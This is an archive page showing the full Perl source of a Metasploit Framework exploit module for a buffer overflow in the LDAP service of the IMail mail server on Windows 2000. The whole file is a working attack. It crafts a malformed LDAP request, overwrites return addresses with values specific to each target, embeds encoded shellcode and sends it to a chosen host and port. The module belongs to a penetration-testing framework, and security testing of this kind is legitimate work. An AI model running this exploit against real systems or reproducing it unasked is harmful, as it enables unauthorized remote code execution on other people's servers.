home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / exploits / imail_ldap.pm < prev    next >
Encoding:
Perl POD Document  |  2006-06-30  |  2.8 KB  |  108 lines
  1.  
  2. ##
  3. # This file is part of the Metasploit Framework and may be redistributed
  4. # according to the licenses defined in the Authors field below. In the
  5. # case of an unknown or missing license, this file defaults to the same
  6. # license as the core Framework (dual GPLv2 and Artistic). The latest
  7. # version of the Framework can always be obtained from metasploit.com.
  8. ##
  9.  
  10. package Msf::Exploit::imail_ldap;
  11. use base "Msf::Exploit";
  12. use strict;
  13. use Pex::Text;
  14.  
  15. my $advanced = { };
  16. my $info =
  17.   {
  18.     'Name'    => 'IMail LDAP Service Buffer Overflow',
  19.     'Version' => '$Revision: 1.17 $',
  20.     'Authors' => [ 'H D Moore <hdm [at] metasploit.com>', ],
  21.  
  22.     'Arch'  => [ 'x86' ],
  23.     'OS'    => [ 'win32', 'win2000' ],
  24.     'Priv'  => 0,
  25.  
  26.     'UserOpts'  =>
  27.       {
  28.         'RHOST' => [1, 'ADDR', 'The target address'],
  29.         'RPORT' => [1, 'PORT', 'The target port', 389],
  30.         'SSL'   => [0, 'BOOL', 'Use SSL'],
  31.       },
  32.  
  33.     'Payload' =>
  34.       {
  35.         'Space'  => 1024,
  36.         'BadChars'  => "\x00\x0a\x0d\x20",
  37.       },
  38.  
  39.     'Description'  => Pex::Text::Freeform(qq{
  40.         This exploits a buffer overflow in the LDAP service that is
  41.         part of the IMail product. This module was tested against
  42.         version 7.10 and 8.5, both running on Windows 2000.    
  43. }),
  44.  
  45.     'Refs'  =>
  46.       [
  47.         ['OSVDB', '3984'],
  48.         ['URL', 'http://secunia.com/advisories/10880/'],
  49.         ['MIL', '34'],
  50.       ],
  51.  
  52.     'Targets' =>
  53.       [
  54.         ["Windows 2000 English",   0x75023386],
  55.         ["Windows 2000 IMail 8.x", 0x1002a619],
  56.       ],
  57.  
  58.     'Keys'  => ['imail'],
  59.  
  60.     'DisclosureDate' => 'Feb 17 2004',
  61.   };
  62.  
  63. sub new {
  64.     my $class = shift;
  65.     my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
  66.     return($self);
  67. }
  68.  
  69. sub Exploit {
  70.     my $self = shift;
  71.     my $target_host = $self->GetVar('RHOST');
  72.     my $target_port = $self->GetVar('RPORT');
  73.     my $target_idx  = $self->GetVar('TARGET');
  74.     my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
  75.  
  76.     my $target = $self->Targets->[$target_idx];
  77.  
  78.     my $request =
  79.       "\x30\x82\x0a\x3d\x02\x01\x01\x60\x82\x01\x36\x02\xff\xff\xff\xff\x20".
  80.       ("\xcc" x 5000);
  81.  
  82.     # Universal exploit, targets 6.x, 7.x, and 8.x at once ;)
  83.     # Thanks for johnny cyberpunk for 6/7 vs 8 diffs
  84.     substr($request, 77, 4, "\xeb\x0eXX");              # jmp 14
  85.     substr($request, 81, 4, pack('V', $target->[1]));   # return to above jmp (6/7)
  86.     substr($request, 85, 4, "\xeb\x04XX");              # jmp 6
  87.     substr($request, 89, 4, pack('V', $target->[1]));   # return to above jmp (8)
  88.     substr($request, 93, length($shellcode), $shellcode);
  89.  
  90.     my $s = Msf::Socket::Tcp->new
  91.       (
  92.         'PeerAddr'  => $target_host,
  93.         'PeerPort'  => $target_port,
  94.         'LocalPort' => $self->GetVar('CPORT'),
  95.         'SSL'       => $self->GetVar('SSL'),
  96.       );
  97.     if ($s->IsError) {
  98.         $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
  99.         return;
  100.     }
  101.  
  102.     $self->PrintLine("[*] Connected to LDAP, trying to exploit ".$target->[0]);
  103.     $s->Send($request);
  104.     sleep(2);
  105.     return;
  106. }
  107.  
  108.